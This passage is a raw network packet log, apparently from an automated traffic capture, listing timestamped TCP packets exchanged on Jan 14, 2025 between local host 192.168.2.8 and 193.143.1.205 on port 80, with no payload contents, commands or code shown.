                          Jan 14, 2025 08:56:28.990854979 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.990892887 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.991552114 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.991569996 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.991580963 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.991591930 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.991600037 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.991611004 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.991625071 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.992486954 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.992500067 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.992516994 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.992544889 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.992544889 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.992980957 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.992991924 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993004084 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993015051 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993035078 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.993060112 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.993717909 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993730068 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993745089 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993757963 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993767023 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.993777990 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.993801117 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.994668961 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.994683981 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.994697094 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.994705915 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.994707108 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.994718075 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.994724989 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.994751930 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.995495081 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.995507956 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.995517969 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.995528936 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.995539904 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:28.995563984 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:28.995583057 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.016758919 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.016794920 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.016881943 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.016921997 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.016957045 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.016973019 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017010927 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017044067 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017069101 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017077923 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017112017 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017121077 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017163992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017196894 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017203093 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017230988 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017263889 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017277002 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017297029 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017332077 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017347097 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.017365932 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017471075 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.017483950 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.047826052 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.047842979 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.047861099 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.047872066 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.047883034 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.047914982 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.047949076 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.075884104 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.075951099 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.075987101 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076020956 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076023102 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076054096 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076071978 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076087952 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076122046 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076136112 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076158047 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076190948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076205015 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076241970 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076287031 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076292992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076328039 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076361895 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076380014 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076395035 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076427937 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076440096 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.076463938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.076514959 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109013081 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109049082 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109100103 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109102011 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109134912 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109169960 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109189987 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109201908 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109237909 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109251976 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109338999 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109371901 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109381914 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109406948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109440088 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109450102 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109476089 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109524012 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109559059 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109592915 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109626055 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109638929 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109659910 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109702110 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109735012 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109792948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109842062 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109857082 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.109877110 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109910965 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109942913 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.109976053 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110009909 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110044003 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110054016 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110054016 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110054016 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110434055 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110467911 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110486031 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110502005 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110533953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110551119 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110568047 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110601902 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110611916 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110645056 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110677958 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110694885 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110713005 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110744953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110758066 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110778093 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110810995 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110820055 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110845089 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110878944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110894918 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.110913038 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110945940 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.110960960 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111275911 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111309052 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111327887 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111362934 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111397028 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111404896 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111429930 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111463070 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111483097 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111495972 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111529112 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111545086 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111561060 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111593008 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111605883 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111627102 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111660957 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111669064 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111694098 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111726999 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111738920 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111759901 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111793041 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111805916 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111826897 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.111869097 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.111869097 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112216949 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112267971 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112268925 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112303019 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112337112 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112350941 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112370968 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112406969 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112416983 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112421989 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112440109 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112458944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112476110 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112493992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112540960 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112550974 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112574100 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112608910 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112623930 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112643003 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112675905 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112694025 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.112709999 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112742901 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.112755060 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113167048 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113198996 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113207102 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113250017 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113282919 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113292933 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113317966 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113349915 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113358021 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113384962 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113416910 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113435030 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113451004 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113482952 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113497019 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113518000 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113564968 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113576889 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113610983 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113645077 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113656998 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113678932 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113712072 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113727093 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.113745928 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113779068 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.113790989 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.114034891 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.114391088 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.114419937 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.114442110 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.126669884 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.165642023 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.165864944 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.165899992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.165935993 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.165951014 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.165968895 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.165992022 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.166003942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166037083 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166054964 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.166070938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166104078 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166119099 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.166137934 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166169882 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166182995 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.166204929 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166237116 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166254997 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.166273117 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166306973 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.166321039 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199023962 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199048996 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199060917 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199073076 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199090004 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199100971 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199111938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199131012 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199141979 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199152946 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199162960 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199172974 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199182987 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199193954 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199203968 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199218035 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199219942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199232101 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199243069 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199254990 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199265003 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199265957 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199275970 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199278116 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199287891 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199292898 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199306965 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199320078 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199331045 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199341059 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199351072 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199352980 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199362993 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199374914 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199376106 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199393034 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199412107 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199423075 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199434042 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199444056 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199445009 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199455023 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199465036 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199470997 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199481964 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199491024 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199492931 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199512959 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199551105 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199580908 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199584961 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199592113 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199605942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199618101 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199626923 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199628115 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199640036 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199651003 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199676037 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199681997 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199692965 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199703932 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199712992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199723005 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199733973 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199748993 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199773073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199774027 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199784040 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199795008 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199805021 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199815989 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199825048 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.199853897 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.199876070 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204416037 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204437971 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204448938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204458952 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204469919 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204480886 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204492092 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204502106 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204508066 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204514027 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204525948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204535961 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204546928 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204554081 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204556942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204581022 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204582930 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204592943 CET8049704193.143.1.205192.168.2.8
